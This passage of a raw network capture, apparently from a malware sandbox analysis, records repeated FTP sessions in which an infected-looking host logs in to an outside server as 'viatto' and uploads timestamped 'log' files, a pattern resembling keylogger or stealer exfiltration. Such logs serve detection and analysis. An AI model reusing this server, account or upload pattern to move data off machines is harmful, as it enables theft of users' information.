                                                                                                                                    Oct 10, 2022 06:02:34.051449060 CEST4977521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:34.074527025 CEST2149775185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:34.074987888 CEST4977521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:34.099158049 CEST2149775185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:34.099618912 CEST4977521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:34.123334885 CEST2149775185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:34.124330044 CEST4977521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:34.147615910 CEST2149775185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:34.149322033 CEST4977521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:34.172715902 CEST2149775185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,38)
                                                                                                                                    Oct 10, 2022 06:02:34.198304892 CEST4977521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.37.txt
                                                                                                                                    Oct 10, 2022 06:02:34.222953081 CEST2149775185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:34.247370958 CEST2149775185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:34.455224037 CEST2149777185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:34.455317974 CEST2149777185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:34.455602884 CEST2149777185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:34.455869913 CEST4977721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:34.479044914 CEST2149777185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:34.488487959 CEST4977721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:34.511775970 CEST2149777185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:34.512031078 CEST4977721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:34.534976959 CEST2149777185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:34.535235882 CEST4977721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:34.558537006 CEST2149777185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:34.559921026 CEST4977721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:34.583241940 CEST2149777185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:34.604456902 CEST4977721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:34.628302097 CEST2149777185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,39)
                                                                                                                                    Oct 10, 2022 06:02:34.653254986 CEST4977721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.38.txt
                                                                                                                                    Oct 10, 2022 06:02:34.677088022 CEST2149777185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:34.702924967 CEST2149777185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:34.900190115 CEST2149779185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:34.900424957 CEST2149779185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:34.900463104 CEST2149779185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:34.901354074 CEST4977921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:34.923873901 CEST2149779185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:34.929382086 CEST4977921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:34.951914072 CEST2149779185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:34.952229023 CEST4977921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:34.974766016 CEST2149779185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:34.975032091 CEST4977921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:34.997951031 CEST2149779185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:34.998437881 CEST4977921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:35.021532059 CEST2149779185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:35.022605896 CEST4977921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:35.045722961 CEST2149779185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,41)
                                                                                                                                    Oct 10, 2022 06:02:35.076721907 CEST4977921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.39.txt
                                                                                                                                    Oct 10, 2022 06:02:35.101604939 CEST2149779185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:35.127149105 CEST2149779185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:35.329256058 CEST2149781185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:35.329315901 CEST2149781185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:35.329350948 CEST2149781185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:35.329652071 CEST4978121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:35.352812052 CEST2149781185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:35.353250027 CEST4978121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:35.375741959 CEST2149781185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:35.376089096 CEST4978121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:35.398770094 CEST2149781185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:35.399486065 CEST4978121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:35.422672033 CEST2149781185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:35.423883915 CEST4978121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:35.447405100 CEST2149781185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:35.448792934 CEST4978121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:35.472054958 CEST2149781185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,42)
                                                                                                                                    Oct 10, 2022 06:02:35.501692057 CEST4978121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.40.txt
                                                                                                                                    Oct 10, 2022 06:02:35.525175095 CEST2149781185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:35.550442934 CEST2149781185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:35.788820982 CEST2149783185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:35.788887978 CEST2149783185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:35.789381027 CEST2149783185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:35.794800043 CEST4978321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:35.817847013 CEST2149783185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:35.820497036 CEST4978321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:35.843813896 CEST2149783185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:35.844481945 CEST4978321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:35.867767096 CEST2149783185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:35.868721962 CEST4978321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:35.892113924 CEST2149783185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:35.893048048 CEST4978321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:35.916105986 CEST2149783185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:35.928775072 CEST4978321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:35.953505039 CEST2149783185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,43)
                                                                                                                                    Oct 10, 2022 06:02:35.979887962 CEST4978321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.41.txt
                                                                                                                                    Oct 10, 2022 06:02:36.004532099 CEST2149783185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:36.033207893 CEST2149783185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:36.221879959 CEST2149785185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:36.222266912 CEST2149785185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:36.222620010 CEST2149785185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:36.227217913 CEST4978521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:36.252568007 CEST2149785185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:36.262727022 CEST4978521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:36.287002087 CEST2149785185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:36.287455082 CEST4978521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:36.311402082 CEST2149785185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:36.311781883 CEST4978521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:36.335709095 CEST2149785185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:36.341216087 CEST4978521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:36.365365028 CEST2149785185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:36.367357969 CEST4978521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:36.392435074 CEST2149785185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,44)
                                                                                                                                    Oct 10, 2022 06:02:36.419337988 CEST4978521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.42.txt
                                                                                                                                    Oct 10, 2022 06:02:36.444211006 CEST2149785185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:36.471609116 CEST2149785185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:36.659415960 CEST2149787185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:36.659666061 CEST2149787185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:36.659761906 CEST2149787185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:36.659897089 CEST4978721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:36.684767962 CEST2149787185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:36.685000896 CEST4978721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:36.709008932 CEST2149787185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:36.709234953 CEST4978721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:36.732666969 CEST2149787185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:36.732914925 CEST4978721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:36.758353949 CEST2149787185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:36.758861065 CEST4978721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:36.782609940 CEST2149787185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:36.783734083 CEST4978721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:36.810520887 CEST2149787185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,45)
                                                                                                                                    Oct 10, 2022 06:02:36.833714962 CEST4978721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.43.txt
                                                                                                                                    Oct 10, 2022 06:02:36.857147932 CEST2149787185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:36.881020069 CEST2149787185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:37.095493078 CEST2149789185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:37.095583916 CEST2149789185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:37.095798969 CEST2149789185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:37.095968962 CEST4978921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:37.122353077 CEST2149789185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:37.122680902 CEST4978921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:37.148624897 CEST2149789185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:37.149111032 CEST4978921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:37.173909903 CEST2149789185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:37.174221039 CEST4978921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:37.200021029 CEST2149789185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:37.200932980 CEST4978921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:37.226635933 CEST2149789185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:37.229041100 CEST4978921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:37.254961014 CEST2149789185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,47)
                                                                                                                                    Oct 10, 2022 06:02:37.279988050 CEST4978921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.44.txt
                                                                                                                                    Oct 10, 2022 06:02:37.308787107 CEST2149789185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:37.339905024 CEST2149789185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:37.548211098 CEST2149791185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:37.548263073 CEST2149791185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:37.548425913 CEST2149791185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:37.549127102 CEST4979121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:37.575745106 CEST2149791185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:37.585671902 CEST4979121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:37.610559940 CEST2149791185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:37.610932112 CEST4979121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:37.634429932 CEST2149791185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:37.634660006 CEST4979121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:37.659218073 CEST2149791185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:37.659893990 CEST4979121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:37.684673071 CEST2149791185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:37.685736895 CEST4979121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:37.712605953 CEST2149791185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,48)
                                                                                                                                    Oct 10, 2022 06:02:37.736520052 CEST4979121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.45.txt
                                                                                                                                    Oct 10, 2022 06:02:37.761668921 CEST2149791185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:37.786766052 CEST2149791185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:37.978769064 CEST2149793185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:37.978816986 CEST2149793185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:37.979085922 CEST2149793185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:37.979722977 CEST4979321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:38.002377033 CEST2149793185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:38.002686977 CEST4979321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:38.025451899 CEST2149793185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:38.025948048 CEST4979321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:38.048686981 CEST2149793185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:38.048963070 CEST4979321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:38.072110891 CEST2149793185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:38.073852062 CEST4979321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:38.097069979 CEST2149793185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:38.098191977 CEST4979321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:38.121192932 CEST2149793185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,49)
                                                                                                                                    Oct 10, 2022 06:02:38.148055077 CEST4979321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.46.txt
                                                                                                                                    Oct 10, 2022 06:02:38.173963070 CEST2149793185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:38.201910973 CEST2149793185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:38.407860041 CEST2149795185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:38.408018112 CEST2149795185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:38.408236027 CEST2149795185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:38.408597946 CEST4979521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:38.432120085 CEST2149795185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:38.432569981 CEST4979521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:38.455782890 CEST2149795185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:38.456238031 CEST4979521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:38.479656935 CEST2149795185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:38.480190039 CEST4979521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:38.503688097 CEST2149795185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:38.504631042 CEST4979521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:38.528242111 CEST2149795185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:38.529531002 CEST4979521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:38.553328037 CEST2149795185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,50)
                                                                                                                                    Oct 10, 2022 06:02:38.583982944 CEST4979521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.47.txt
                                                                                                                                    Oct 10, 2022 06:02:38.607872009 CEST2149795185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:38.636274099 CEST2149795185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:38.831074953 CEST2149797185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:38.831104994 CEST2149797185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:38.831113100 CEST2149797185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:38.831676960 CEST4979721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:38.854669094 CEST2149797185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:38.859213114 CEST4979721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:38.882015944 CEST2149797185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:38.882380962 CEST4979721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:38.905299902 CEST2149797185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:38.905644894 CEST4979721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:38.928903103 CEST2149797185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:38.929975033 CEST4979721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:38.952801943 CEST2149797185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:38.956623077 CEST4979721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:38.979994059 CEST2149797185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,51)
                                                                                                                                    Oct 10, 2022 06:02:39.007491112 CEST4979721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.48.txt
                                                                                                                                    Oct 10, 2022 06:02:39.031630993 CEST2149797185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:39.059000969 CEST2149797185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:39.273478031 CEST2149799185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:39.273524046 CEST2149799185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:39.273902893 CEST2149799185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:39.274092913 CEST4979921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:39.299926043 CEST2149799185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:39.301847935 CEST4979921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:39.326097012 CEST2149799185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:39.327428102 CEST4979921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:39.352384090 CEST2149799185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:39.354866028 CEST4979921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:39.380497932 CEST2149799185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:39.383482933 CEST4979921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:39.410026073 CEST2149799185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:39.411715984 CEST4979921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:39.438208103 CEST2149799185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,53)
                                                                                                                                    Oct 10, 2022 06:02:39.463953972 CEST4979921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.49.txt
                                                                                                                                    Oct 10, 2022 06:02:39.488548994 CEST2149799185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:39.514585972 CEST2149799185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:39.705559969 CEST2149801185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:39.705619097 CEST2149801185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:39.706285954 CEST2149801185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:39.706478119 CEST4980121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:39.729924917 CEST2149801185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:39.736031055 CEST4980121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:39.760328054 CEST2149801185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:39.760642052 CEST4980121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:39.784620047 CEST2149801185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:39.784905910 CEST4980121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:39.809485912 CEST2149801185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:39.810156107 CEST4980121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:39.834111929 CEST2149801185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:39.835320950 CEST4980121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:39.859873056 CEST2149801185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,54)
